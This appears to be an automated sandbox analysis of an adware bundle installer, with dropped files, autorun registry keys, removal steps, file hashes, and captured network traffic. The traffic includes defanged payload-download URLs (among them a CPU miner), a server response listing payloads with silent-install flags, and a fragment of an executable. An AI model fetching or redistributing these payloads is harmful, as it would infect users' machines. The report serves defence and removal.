    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623628240644.46394856b32eb77dfd6fb67f21d6543272da5
.rdata28672476451203.4982dc77f8a1e6985a4361c55642680ddb4f
.data3686415471210243.32787922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata1925121166540800d41d8cd98f00b204e9800998ecf8427e
.rsrc1185792017152174084.10655a504ed888327f013e9b6042c9ab3920f

Dropped from:

2258b2fa478c5298d2989e18828980d3

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 12
cd94fdb6cad0a1bdfdd660de105c7c7e
9ffcde27b445393ee950de1371e7c43b
7975cef8969d02a0cabd784a3c74c8cb
97e4952df76a56d68e69044e1a43d39f
780fc5ed47f296c4e1b277c467eafa42
9afaab770c0e2b9d5905c10288742f99
e9c53b8632b68f0292577f666a972eb4
6f4730a0be5e8067038de9457fdac074
e85909bb2d7c5931b7f2139fefceab0e
6cd2ca94541223158754aefc3f898dd4
8537c506876458e69f1ae9ab7fe92f6c
df84eb115ec1c2bc974734c43acd2d72

Network Activity

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/54.163.246.254
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=50.7.86.58
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe54.239.168.162
hxxp://livestatscounter.com/SysInfo/validator/timer.php50.7.86.58
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe
hxxp://ipgeoapi.com/54.235.206.35
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932
hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe54.239.168.52
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe54.239.168.47
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US37.187.146.33
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI188.165.238.33
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi37.187.146.33
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc94.23.193.213
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11188.165.238.33
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN188.165.238.33
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1188.165.238.33
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1188.165.238.33
hxxp://s3-website-us-east-1.amazonaws.com/setup_362.exe
hxxp://djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800
hxxp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe54.239.168.173
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00269.16.175.10
hxxp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe54.231.33.60
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=193254.231.9.84
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=982369.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=211854.231.9.84
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe69.16.175.42
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe205.185.216.42
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi37.187.137.144
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00169.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=454654.231.9.84
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=618954.231.48.154
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=71554.231.9.84
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00369.16.175.10
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=750769.16.175.10
hxxp://www.djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=80052.1.45.42
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=649654.231.9.84
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=886454.231.9.84
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=993654.231.9.84
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe205.185.216.42
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00569.16.175.10
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe37.59.30.197
hxxp://www.downloadsoup.com/thankyou.php54.243.139.119
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00469.16.175.10
s3.amazonaws.com54.231.97.211
upd.adskyforever.com91.121.172.208

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Fri, 25 Sep 2015 22:45:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.23

3dd..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Fri, 25 Sep 2015 22:45:00 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..3dd..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..hXXps://s3.amazonaws.

<<< skipped >>>

GET /SysInfo/validator/timer.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Fri, 25 Sep 2015 22:45:11 GMT

Content-Type: application/octet-stream

Content-Length: 165898

Connection: keep-alive

X-Powered-By: PHP/5.5.23

Content-Transfer-Encoding: binary

Content-Disposition: attachment; filename=wEvFLQF.exe

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: prof.eorezo.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:24 GMT

Server: Apache/2.2.22

x-eorezo-crc32: -1

x-eorezo-crypted: 1

x-eorezo-length: 357

Set-Cookie: conftime=1443221184; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=eorezo.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1443221184498979; path=/; expires=Sun, 25-Oct-15 22:46:24 GMT

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..

GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:46 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1443221146.dop005.fr7.t,1443221146.cds054.fr7.c

GIF89a.............,...........D..;..

